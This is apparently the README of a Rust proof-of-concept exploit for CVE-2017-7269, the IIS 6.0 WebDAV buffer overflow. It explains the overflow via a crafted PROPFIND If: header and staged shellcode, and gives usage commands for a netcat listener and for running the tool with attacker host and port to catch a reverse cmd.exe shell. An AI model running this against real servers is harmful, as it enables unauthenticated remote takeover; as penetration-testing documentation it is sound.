CVE-2017-7269 - IIS 6.0 WebDAV Buffer Overflow

RustSecurity

Repository

A Rust implementation of the POC for CVE-2017-7269, targeting the WebDAV service in Microsoft Internet Information Services (IIS) 6.0.

Vulnerability Overview

CVE-2017-7269 is a critical stack-based buffer overflow vulnerability found in the WebDAV service of Microsoft IIS 6.0, which was shipped with Windows Server 2003 R2. A successful exploit allows an unauthenticated attacker to achieve remote code execution on the target server.

Technical Details

  • Vulnerable Component: httpext.dll (IIS WebDAV Extension)
  • Vulnerable Function: ScStoragePathFromUrl
  • Trigger: A specially crafted PROPFIND HTTP request.
  • Attack Vector: An overly long If: header containing multiple URLs.

Description

The vulnerability is a classic stack buffer overflow. It is triggered when the ScStoragePathFromUrl function processes a PROPFIND request containing a malicious If: header.

This exploit crafts such a header with a long string of bytes, which overflows the buffer allocated on the stack. This overflow overwrites critical stack data, including the saved return address (EIP). The exploit hijacks the program's execution flow by pointing this return address to a small initial shellcode payload also located within the malicious header. This first-stage shellcode's job is to find and execute the main payload, a reverse shell, which is sent in the body of the same HTTP request. This POC successfully demonstrates remote code execution by connecting a cmd.exe shell back to an attacker-controlled listener.

Usage

  1. Start a listener
    On the attacker machine, start a netcat listener to receive the reverse shell connection.
nc -lvnp <attacker-port>
  1. Run the exploit
    Execute the compiled binary from the target/release directory, providing the target's IP/port and your local listener's IP/port.
cargo run -- --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  1. Get Shell
    If the target is vulnerable, you will see a connection on your netcat listener, giving you a command shell on the remote server.

Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to.

Tags

cve-2017-7269

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-10-07